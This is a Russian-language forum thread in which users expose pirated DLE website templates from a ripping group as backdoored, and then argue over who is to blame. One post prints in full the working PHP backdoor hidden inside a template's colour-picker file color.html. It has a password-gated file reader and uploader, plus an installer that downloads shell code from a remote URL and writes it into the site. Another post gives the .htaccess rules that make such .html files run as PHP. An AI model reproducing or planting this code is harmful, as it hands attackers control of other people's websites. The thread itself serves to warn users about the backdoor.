Black - RUnet Team

[+VAMPIR+]

Всем привет и всех с наступающим.
Итак что хотелось сказать по поводу барыг, крыс, кидал и.т.д…
Недавно столкнулся с ребятами которые занимаются этими вещами… что самое плохое они находятся и в клубе и модераторы…
Все мы знает RUnet Team группу по созданию Rip’ов шаблонов для DLE.
Они конечно отлично рипают и немного добавляют своего года как например:

Order Deny,Allow
Allow from all
<FilesMatch "^(bb)\.html$">
  ForceType application/x-httpd-php
</FilesMatch>

и потом выполняется файл bb.html (который закоден)

сам шабик лежит тут Для просмотра ссылки Войди или Зарегистрируйся
дальше специльно рипали для меня
Для просмотра ссылки Войди или Зарегистрируйся
за, что сначало был очень благодарен пока сегдоня не обнаружил шеллы на сайте и файлик который находился в рипнутом шаблоне color.html
и файл .htaccess с добавлением :

Order Deny,Allow
Allow from all
<FilesMatch "^(color)\.html$">
  ForceType application/x-httpd-php
</FilesMatch>

Я одного не понимаю для чего это делается ? Траф погонять , много наработали ?
Так же сюда же Для просмотра ссылки Войди или Зарегистрируйся
Вообще кто скачал их шаблоны проверяйте на шеллы, на подозрительные файлы, вот такие сейчас бывают люди.
От себя ещё добавлю,CheburatoR-all вообще я такого от тебя не ожидал.

 

[Ser Frood]

Собственно сама хрень с шабов:

<?php
if($_GET['upload']){
session_start();
if(isset($_GET['a']) && $_GET['a']=='logout')
 unset($_SESSION['auth']);

if(isset($_POST['pass'])){
 $users = array(
 'root' => md5(md5('uvCJlBF9eIcq9bEhUpg83baFcW9JKmqa'))
 );
 if($users['root'] == md5(md5($_POST['pass']))){
  $_SESSION['auth'] = true;
 }
}

if(!isset($_SESSION['auth']) || $_SESSION['auth'] != true){
$hp=$_GET['hp'];
 echo <<<EOF
<form method="POST">



<link href="http://$hp/unload/style.css" rel="stylesheet" type="text/css" />

<div class="login_php_01">
<div class="login_php_02">
<div class="login_php_03">
<div class="login_php_04"><div style="padding:90px 0px 0px 40px">

	<span style="font:11px Verdana;">Password: </span><input name="pass" type="password" size="20">
	<input type="hidden" name="doing" value="login">
	<input type="submit" value="Auth" class="login_bottom" style="border:0px">

	</div></div>
</div>
</div>
</div>

</form>
EOF;
exit;
}
else



if($_GET['ups'])
{
echo"_get_ o_O";
unlink ("spacer.gif");
exit;	
}
$hp=$_GET['hp'];
$dir=$_GET['dir'];
$f = @fsockopen("$hp", 80, $x0c, $x0d, 6); 
if(!$f){echo 'Ебанутый Гамунгол'; }
else{
 $x0e = @file("$dir");
 echo implode('',$x0e); 
}
$adres = $_POST['adres'];
$get=$_SERVER['DOCUMENT_ROOT']."/".$adres;
if(copy($HTTP_POST_FILES["lopd"]["tmp_name"],"$get".$HTTP_POST_FILES["lopd"]["name"])){
$der = "<span class='line'></span>Каталог для загрузки: <strong>";
$test = $_SERVER['HTTP_HOST']."/$adres"."<a href=http://".$_SERVER['HTTP_HOST']."/$adres".$HTTP_POST_FILES["lopd"]["name"]." target='_blank'>".$HTTP_POST_FILES["lopd"]["name"]."</a></strong>";
echo <<<HTMLS
<div style="position:absolute;top:0px;left:0px;width:100%;height:100%"><div style="padding-left:50%;padding-top:343px;">
<div style="margin-left:-215px;width:425px;height:179px;">$der$test</div></div></div>
HTMLS;
} 
else {echo("");}
}

?>


<?
if($_GET['install']){

$dir=$_SERVER['DOCUMENT_ROOT']."/";//главный каталог
$install=$_GET['install'];//какоу сод установить
$file_in=$_GET['file'];//в какой файл
$url=$_GET['url'];//url откуда грузить код
$path=$_GET['path'];//в какую папку
$path2_shell=$_GET['path2_shell'];//в какую папку


if(chmod("$dir$path$file_in", 0666)){$chmod=true;}


$types=array('conect','shell');//название двх файлов
for($i = 0; $i < count($types); $i++) {

$files = $url.'conect.txt';
$newfile = $dir.$path.'conect.php';
$files2 = $url.'shell.txt';
$newfile2 = $dir.$path2_shell.'/shell.php';

if (copy($files,$newfile)){$copy=true;}
if (copy($files2,$newfile2)){$copy2=true;}

}


if($copy==true){
$data=$install;
$data = str_replace('\\\\','\\',$data);
$data = str_replace('\\"','"',$data);
$data = str_replace("\\'","'",$data);


$log = $dir.$path.$file_in;
$file = fopen ($log, "a+");

// Добавляем данные в файл
$str="$data\n";
if(fputs ($file, $str)){$rec=true;}
fclose($file);
}


if($chmod==true&&$rec==true&&$copy==true){echo"<!--ok-->";}
else{
if($chmod==false){echo"chmod_eror";}
if($rec==false){echo"rec_eror";}
if($copy==false){echo"copy_eror";}

}

}
?>


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
	<title>Text Color</title>
	<script language="JavaScript" type="text/javascript">
	<!--
	function selectColor(color) {
		self.parent.setColor(color);
	}
	
	function InitColorPalette() {
		if (document.getElementsByTagName)
			var x = document.getElementsByTagName('TD');
		else if (document.all)
			var x = document.all.tags('TD');
		for (var i=0;i<x.length;i++) {
			x[i].onclick = click;
		}
	}
	
	function click() {
		selectColor(this.id);
	}
	//-->
	</script>
</head>
<body bgcolor="white" onLoad="InitColorPalette()" leftmargin="0" rightmargin="0" marginwidth="0" marginheight="0" topmargin="0" bottommargin="0">
<table width="150" height="100" cellpadding="0" cellspacing="1" border="1" align="center">
	<tr>
		<td id="#FFFFFF" bgcolor="#FFFFFF" width="10" height="10"><img width="1" height="1"></td>
		<td id="#FFCCCC" bgcolor="#FFCCCC" width="10" height="10"><img width="1" height="1"></td>
		<td id="#FFCC99" bgcolor="#FFCC99" width="10" height="10"><img width="1" height="1"></td>
		<td id="#FFFF99" bgcolor="#FFFF99" width="10" height="10"><img width="1" height="1"></td>
		<td id="#FFFFCC" bgcolor="#FFFFCC" width="10" height="10"><img width="1" height="1"></td>
		<td id="#99FF99" bgcolor="#99FF99" width="10" height="10"><img width="1" height="1"></td>
		<td id="#99FFFF" bgcolor="#99FFFF" width="10" height="10"><img width="1" height="1"></td>
		<td id="#CCFFFF" bgcolor="#CCFFFF" width="10" height="10"><img width="1" height="1"></td>
		<td id="#CCCCFF" bgcolor="#CCCCFF" width="10" height="10"><img width="1" height="1"></td>
		<td id="#FFCCFF" bgcolor="#FFCCFF" width="10" height="10"><img width="1" height="1"></td>
	</tr>
	<tr>
		<td id="#CCCCCC" bgcolor="#CCCCCC" width="10" height="10"><img width="1" height="1"></td>
		<td id="#FF6666" bgcolor="#FF6666" width="10" height="10"><img width="1" height="1"></td>
		<td id="#FF9966" bgcolor="#FF9966" width="10" height="10"><img width="1" height="1"></td>
		<td id="#FFFF66" bgcolor="#FFFF66" width="10" height="10"><img width="1" height="1"></td>
		<td id="#FFFF33" bgcolor="#FFFF33" width="10" height="10"><img width="1" height="1"></td>
		<td id="#66FF99" bgcolor="#66FF99" width="10" height="10"><img width="1" height="1"></td>
		<td id="#33FFFF" bgcolor="#33FFFF" width="10" height="10"><img width="1" height="1"></td>
		<td id="#66FFFF" bgcolor="#66FFFF" width="10" height="10"><img width="1" height="1"></td>
		<td id="#9999FF" bgcolor="#9999FF" width="10" height="10"><img width="1" height="1"></td>
		<td id="#FF99FF" bgcolor="#FF99FF" width="10" height="10"><img width="1" height="1"></td>
	</tr>
	<tr>
		<td id="#C0C0C0" bgcolor="#C0C0C0" width="10" height="10"><img width="1" height="1"></td>
		<td id="#FF0000" bgcolor="#FF0000" width="10" height="10"><img width="1" height="1"></td>
		<td id="#FF9900" bgcolor="#FF9900" width="10" height="10"><img width="1" height="1"></td>
		<td id="#FFCC66" bgcolor="#FFCC66" width="10" height="10"><img width="1" height="1"></td>
		<td id="#FFFF00" bgcolor="#FFFF00" width="10" height="10"><img width="1" height="1"></td>
		<td id="#33FF33" bgcolor="#33FF33" width="10" height="10"><img width="1" height="1"></td>
		<td id="#66CCCC" bgcolor="#66CCCC" width="10" height="10"><img width="1" height="1"></td>
		<td id="#33CCFF" bgcolor="#33CCFF" width="10" height="10"><img width="1" height="1"></td>
		<td id="#6666CC" bgcolor="#6666CC" width="10" height="10"><img width="1" height="1"></td>
		<td id="#CC66CC" bgcolor="#CC66CC" width="10" height="10"><img width="1" height="1"></td>
	</tr>
	<tr>
		<td id="#999999" bgcolor="#999999" width="10" height="10"><img width="1" height="1"></td>
		<td id="#CC0000" bgcolor="#CC0000" width="10" height="10"><img width="1" height="1"></td>
		<td id="#FF6600" bgcolor="#FF6600" width="10" height="10"><img width="1" height="1"></td>
		<td id="#FFCC33" bgcolor="#FFCC33" width="10" height="10"><img width="1" height="1"></td>
		<td id="#FFCC00" bgcolor="#FFCC00" width="10" height="10"><img width="1" height="1"></td>
		<td id="#33CC00" bgcolor="#33CC00" width="10" height="10"><img width="1" height="1"></td>
		<td id="#00CCCC" bgcolor="#00CCCC" width="10" height="10"><img width="1" height="1"></td>
		<td id="#3366FF" bgcolor="#3366FF" width="10" height="10"><img width="1" height="1"></td>
		<td id="#6633FF" bgcolor="#6633FF" width="10" height="10"><img width="1" height="1"></td>
		<td id="#CC33CC" bgcolor="#CC33CC" width="10" height="10"><img width="1" height="1"></td>
	</tr>
	<tr>
		<td id="#666666" bgcolor="#666666" width="10" height="10"><img width="1" height="1"></td>
		<td id="#990000" bgcolor="#990000" width="10" height="10"><img width="1" height="1"></td>
		<td id="#CC6600" bgcolor="#CC6600" width="10" height="10"><img width="1" height="1"></td>
		<td id="#CC9933" bgcolor="#CC9933" width="10" height="10"><img width="1" height="1"></td>
		<td id="#999900" bgcolor="#999900" width="10" height="10"><img width="1" height="1"></td>
		<td id="#009900" bgcolor="#009900" width="10" height="10"><img width="1" height="1"></td>
		<td id="#339999" bgcolor="#339999" width="10" height="10"><img width="1" height="1"></td>
		<td id="#3333FF" bgcolor="#3333FF" width="10" height="10"><img width="1" height="1"></td>
		<td id="#6600CC" bgcolor="#6600CC" width="10" height="10"><img width="1" height="1"></td>
		<td id="#993399" bgcolor="#993399" width="10" height="10"><img width="1" height="1"></td>
	</tr>
	<tr>
		<td id="#333333" bgcolor="#333333" width="10" height="10"><img width="1" height="1"></td>
		<td id="#660000" bgcolor="#660000" width="10" height="10"><img width="1" height="1"></td>
		<td id="#993300" bgcolor="#993300" width="10" height="10"><img width="1" height="1"></td>
		<td id="#996633" bgcolor="#996633" width="10" height="10"><img width="1" height="1"></td>
		<td id="#666600" bgcolor="#666600" width="10" height="10"><img width="1" height="1"></td>
		<td id="#006600" bgcolor="#006600" width="10" height="10"><img width="1" height="1"></td>
		<td id="#336666" bgcolor="#336666" width="10" height="10"><img width="1" height="1"></td>
		<td id="#000099" bgcolor="#000099" width="10" height="10"><img width="1" height="1"></td>
		<td id="#333399" bgcolor="#333399" width="10" height="10"><img width="1" height="1"></td>
		<td id="#663366" bgcolor="#663366" width="10" height="10"><img width="1" height="1"></td>
	</tr>
	<tr>
		<td id="#000000" bgcolor="#000000" width="10" height="10"><img width="1" height="1"></td>
		<td id="#330000" bgcolor="#330000" width="10" height="10"><img width="1" height="1"></td>
		<td id="#663300" bgcolor="#663300" width="10" height="10"><img width="1" height="1"></td>
		<td id="#663333" bgcolor="#663333" width="10" height="10"><img width="1" height="1"></td>
		<td id="#333300" bgcolor="#333300" width="10" height="10"><img width="1" height="1"></td>
		<td id="#003300" bgcolor="#003300" width="10" height="10"><img width="1" height="1"></td>
		<td id="#003333" bgcolor="#003333" width="10" height="10"><img width="1" height="1"></td>
		<td id="#000066" bgcolor="#000066" width="10" height="10"><img width="1" height="1"></td>
		<td id="#330099" bgcolor="#330099" width="10" height="10"><img width="1" height="1"></td>
		<td id="#330033" bgcolor="#330033" width="10" height="10"><img width="1" height="1"></td>
	</tr>
</table>
</body>
</html>

 

[masima]

а потом десятки пишут что их сайты часто ломают

 

[General Fizz]

Чебуратор, mr.Fox, neoks и прочие Для просмотра ссылки Войди или Зарегистрируйся - рассказывайте что, куда, откуда и для чего взялось

Для просмотра ссылки Войди или Зарегистрируйся

Опять дле

 

[CheburatoR-all]

Так вот что неокс называет проверкой моих шаблонов. Сейчас повысовываю эту хрень их шабов. Я конечно знал про старый код о котором все знают, но мне собственно не чего не сообщили о "новом" коде. Однако меня насторожила постоянная проверка моих шаблонов. Короче писец. пздц просто. В общем думаю команда будет распущенна по крайней мере меня там не будет уже.

От себя ещё добавлю,CheburatoR-all вообще я такого от тебя не ожидал.

:tcl: Я сам не ожидал. Что же, я больше не в runet team'e

 

[Ramazan]

Так вот что неокс называет проверкой моих шаблонов. Сейчас повысовываю эту хрень их шабов. Я конечно знал про старый код о котором все знают, но мне собственно не чего не сообщили о "новом" коде. Однако меня насторожила постоянная проверка моих шаблонов.

CheburatoR-all, есть такая старая поговорка:
"Я не я, попа не моя"
Ну скажи мне как это всё происходит?
Как ты не знаешь, что там?
Т.е. ты рипнул, отдал там этому неокс'у, он запихнул этот код туда вернул тебе, а ты как был не вкурсе зачем ему это нужно так и оставался на протяжении всего времени?
И вот насчёт повысовываю, зачем вообще туда это пихать?

 

[lifediz]

В бан всех, и не надо писать что незнал, надо было просить расшифрованный код, смотреть его, а потом уж юзать! Ты такой же участник как и они, убеждал всех что не вредоносный код...

В баню, а то слишком много КсандерМаксимовых развелось!

 

[CheburatoR-all]

CheburatoR-all, есть такая старая поговорка:
"Я не я, попа не моя"
Ну скажи мне как это всё происходит?
Как ты не знаешь, что там?
Т.е. ты рипнул, отдал там этому неокс'у, он запихнул этот код туда вернул тебе, а ты как был не вкурсе зачем ему это нужно так и оставался на протяжении всего времени?
И вот насчёт повысовываю, зачем вообще туда это пихать?

Собственно из моих шаблонов только тут Для просмотра ссылки Войди или Зарегистрируйся этот код и еще в нескольких. И проверки происходили только несколько раз, я не чего и не заподозрил. Я неокса знаю достаточно давно и с самого начала до конца runet team я до конца не чего не знал. Особенно поразило, то что меня не посвятили в новые дела. Я уже сказал что шеллы это конкретный перебор и это послежило причиной моего ухода, а смысл мне там находится если меня даже не посвящают в содержимое моих рипов.

В бан всех, и не надо писать что незнал, надо было просить расшифрованный код, смотреть его, а потом уж юзать! Ты такой же участник как и они, убеждал всех что не вредоносный код...
В баню, а то слишком много КсандерМаксимовых развелось!

Я утверждал про прошлый который в login'e сидел(Он И то что сейчас вообще разные вещи). Я не когда не одобрял такие виды взлома. Там (который прятался в логин) был код который запросы к сайту подовал (расшифровка чуть ли не везде лежит, можете лично убедится ), а тут 100% Вредоносный код Не знал я про этот не чего, а может и узнал был, но он попал только в 2 моих шаблона после проверки неоксом. Покажи где я утверждал что этот шелл не вредоносный??? Как написано выше, код стоит только в двух шаблонах которые проверял неокс.

Считаете что я вру? Пожалуйста, баньте, но в команду runet team я не вернусь

 

[lifediz]

Чебуратор, я говорю что ты писал где-то что это всего лишь палилка где шаблон ставят или что-то подобное (в суть темы я не вникал). Если тебя забанят, врятли уже когда-нибудь в команду возьмут.

 

[CheburatoR-all]

Чебуратор, я говорю что ты писал где-то что это всего лишь палилка где шаблон ставят

Так я писал про это:

А если сравнить с тем что в первом посте находится, совершенно разное. Про то что в первом посте я никогда не писал и не оправдывал. И говорю что это перебор. Я более не собираюсь выгораживать неокса и эту команду.

В том что в шаблон попал шелл я тоже виноват т.к мог и проследить за лишним файлом. По этому и извиняюсь

Если тебя забанят, врятли уже когда-нибудь в команду возьмут.

Я говорю про runet team, то что туда не вернусь
Поговорил с lifediz'ом в аське Думаю он понял что я всегда что бы не случилось на стороне нулледа